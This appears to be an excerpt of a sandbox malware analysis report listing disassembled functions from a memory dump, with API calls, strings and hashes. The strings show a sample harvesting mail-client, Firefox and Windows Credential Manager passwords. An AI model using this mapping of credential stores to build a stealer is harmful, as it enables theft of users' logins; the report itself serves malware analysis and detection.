                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetstrchr
                  • String ID: 0$6
                  • API String ID: 2300387033-3849865405
                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$memsetsprintf
                  • String ID: %s (%s)
                  • API String ID: 3756086014-1363028141
                  • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                  • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$memsetsprintf
                  • String ID: %2.2X
                  • API String ID: 125969286-791839006
                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                  APIs
                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                  • CloseHandle.KERNEL32(?), ref: 00444206
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                  • String ID: ACD
                  • API String ID: 1886237854-620537770
                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                  APIs
                  • memset.MSVCRT ref: 004091EC
                  • sprintf.MSVCRT ref: 00409201
                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                  • SetWindowTextA.USER32(?,?), ref: 00409228
                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                  • String ID: caption$dialog_%d
                  • API String ID: 2923679083-4161923789
                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                  APIs
                  Strings
                  • abort due to ROLLBACK, xrefs: 00428781
                  • unknown error, xrefs: 004277B2
                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                  • no such savepoint: %s, xrefs: 00426A02
                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                  • API String ID: 3510742995-3035234601
                  • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                  • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                  • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                  • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                  • API String ID: 2221118986-3608744896
                  • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                  • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                  • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                  • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                  APIs
                  • memcpy.MSVCRT ref: 00442A5E
                    • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemcpy
                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                  • API String ID: 1784268899-4153596280
                  • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                  • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                  • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                  • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                  • memset.MSVCRT ref: 00410246
                  • memset.MSVCRT ref: 00410258
                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                  • memset.MSVCRT ref: 0041033F
                  • _mbscpy.MSVCRT ref: 00410364
                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 3974772901-0
                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                  APIs
                  • wcslen.MSVCRT ref: 0044406C
                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                  • strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                  • memcpy.MSVCRT ref: 004440EB
                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                  • String ID:
                  • API String ID: 577244452-0
                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                  APIs
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • _strcmpi.MSVCRT ref: 00404518
                  • _strcmpi.MSVCRT ref: 00404536
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$memcpystrlen
                  • String ID: imap$pop3$smtp
                  • API String ID: 2025310588-821077329
                  • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                  • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                  APIs
                  • memset.MSVCRT ref: 0040C02D
                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2726666094-3614832568
                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                  APIs
                  • memset.MSVCRT ref: 00403A88
                  • memset.MSVCRT ref: 00403AA1
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                  • strlen.MSVCRT ref: 00403AE9
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                  • String ID:
                  • API String ID: 1786725549-0
                  • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                  • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                  • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                  • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                  • OpenClipboard.USER32(?), ref: 0040C1B1
                  • GetLastError.KERNEL32 ref: 0040C1CA
                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                  • String ID:
                  • API String ID: 2014771361-0
                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                  APIs
                  • memcmp.MSVCRT ref: 00406151
                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                  • memcmp.MSVCRT ref: 0040617C
                  • memcmp.MSVCRT ref: 004061A4
                  • memcpy.MSVCRT ref: 004061C1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: global-salt$password-check
                  • API String ID: 231171946-3927197501
                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                  • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004016A3
                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                  • BeginPaint.USER32(?,?), ref: 004016D7
                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                  • EndPaint.USER32(?,?), ref: 004016F3
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                  • String ID:
                  • API String ID: 19018683-0
                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                  APIs
                  • memset.MSVCRT ref: 0040644F
                  • memcpy.MSVCRT ref: 00406462
                  • memcpy.MSVCRT ref: 00406475
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                  • memcpy.MSVCRT ref: 004064B9
                  • memcpy.MSVCRT ref: 004064CC
                  • memcpy.MSVCRT ref: 004064F9
                  • memcpy.MSVCRT ref: 0040650E
                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                  APIs
                  • memset.MSVCRT ref: 0044495F
                  • memset.MSVCRT ref: 00444978
                  • memset.MSVCRT ref: 0044498C
                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                  • strlen.MSVCRT ref: 004449A8
                  • memcpy.MSVCRT ref: 004449CD
                  • memcpy.MSVCRT ref: 004449E3
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                  • memcpy.MSVCRT ref: 00444A23
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset$strlen
                  • String ID:
                  • API String ID: 2142929671-0
                  • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                  • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                  • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                  • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                  APIs
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                  • strlen.MSVCRT ref: 0040F7BE
                  • _mbscpy.MSVCRT ref: 0040F7CF
                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Passport.Net\*
                  • API String ID: 2329438634-3671122194
                  • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                  • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                  APIs
                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                  • memset.MSVCRT ref: 0040330B
                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                  • strchr.MSVCRT ref: 0040335A
                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                  • strlen.MSVCRT ref: 0040339C
                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                  • String ID: Personalities
                  • API String ID: 2103853322-4287407858
                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                  APIs
                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                  • memcpy.MSVCRT ref: 004108C3
                  Strings
                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FromStringUuid$memcpy
                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                  • API String ID: 2859077140-3316789007
                  • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                  • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                  • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                  • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                  APIs
                  • memset.MSVCRT ref: 00444573
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
